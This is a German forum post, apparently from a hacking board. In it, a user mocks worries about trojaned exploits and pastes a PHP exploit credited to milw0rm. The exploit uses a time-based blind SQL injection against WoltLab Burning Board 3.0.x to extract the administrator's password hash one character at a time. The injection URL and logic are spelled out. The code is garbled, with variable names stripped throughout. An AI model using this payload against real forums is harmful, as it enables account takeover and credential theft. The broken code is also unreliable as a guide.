Quote:
Originally Posted by induro
LOOOL ja holt euch die feinen Exploits was zu 98% mit trojaner und würmer verseucht sind. naja jedem das seine wenn man für paar mail addys seine ganzen pc freigeben will.
wer drauf steht^^
|
ja ne ist klar... wie es aussieht weisst du nichtmal was exploitz sind. habe noch nie einen activepearl exploit gesehn der ein trojaner enthält, rofl.
hier ein imba WoltLab Burning Board 3.0.X Remote SQL-Injection Exploit. aufpassen da ist nen dicker backdoor drin... rofl
Code:
<?php
ini_set("max_execution_time",0);
echo "WoltLab Burning Board 3.0.X Remote SQL-Injection Exploit by NBBNn";
start(1, 48);
/** You have to edit this script. **/
/** Works succesfully at 3.0.1. If you enter in 3.0.3 PL1:
index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=blup
you get an mysql error, currently I don't know it's fixxed or not. So, if
there is a vulnerabiltiy. Exploiting takes some times, so get a coffee or
some other drink xD. Please don't use this for crack boards, thx. **/
function start(, )
{
static = "Hash: ";
= "localhost"; // Edit the host
= "/xampp/wbb3/install/wbb3/wbb/"; // and edit the path
=
""."index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC,
%20
(SELECT%20password%20FROM%20wcf1_user%20WHERE%20userID=1%20AND%20IF(ORD(SUBSTR(password,
,))>,BENCHMARK(3000000,MD5(23)),1))"; // Edit 3000000 if the
stuff doesn't work or taking long times.
/** Place here youre autologin cookie **/
= "wcf_cookieHash=; wcf_boardLastActivityTime=; wcf_userID=;
wcf_password=;";
= time();
= fsockopen(, 80);
fputs(, "GET: HTTP/1.1n");
fputs(, "Host: n");
fputs(, "Cookie: n");
fputs(, "Content-type: application/x-www-form-urlencodedn");
fputs(, "Connection: closenn");
fputs(, "n");
fputs($, "n");
//while(!feof()) {
// .= fgets(, 128);
//}
fclose();
= time();
= - ;
if( > 10) // Edit this number, if the script doesn't work
{
if( != 65 or != 66 or != 67 or != 68 or != 69
or != 70)
{
echo "Not the right char () position . Try another...n";
start(, +1);
}
else { start(, +1); }
}
else
{
echo "K, find one ()n";
if ( == 48)
{
.= "0";
}
else if( == 49)
{
.= "1";
}
else if( == 50)
{
.= "2";
}
else if( == 51)
{
.= "3";
}
else if( == 52)
{
.= "4";
}
else if( == 53)
{
.= "5";
}
else if( == 54)
{
.= "6";
}
else if( == 55)
{
.= "7";
}
else if( == 56)
{
.= "8";
}
else if( == 57)
{
.= "9";
}else if( == 58)
{
.= "10";
}
else if( == 65)
{
.= "a";
}
else if( == 66)
{
.= "b";
}
else if( == 67)
{
.= "c";
}
else if( == 68)
{
.= "d";
}
else if( == 69)
{
.= "e";
}
else if( == 70)
{
.= "f";
}
else if( == 97)
{
.= "a";
}
else if( == 98)
{
.= "b";
}
else if( == 99)
{
.= "c";
}
else if( == 100)
{
.= "d";
}
else if( == 101)
{
.= "e";
}
else if( == 102)
{
.= "f";
}
echo "n";
if(strlen() == 32) {
die();
}
else {
start( +1, 48);
}
}
}
?>
# milw0rm.com [2008-02-20]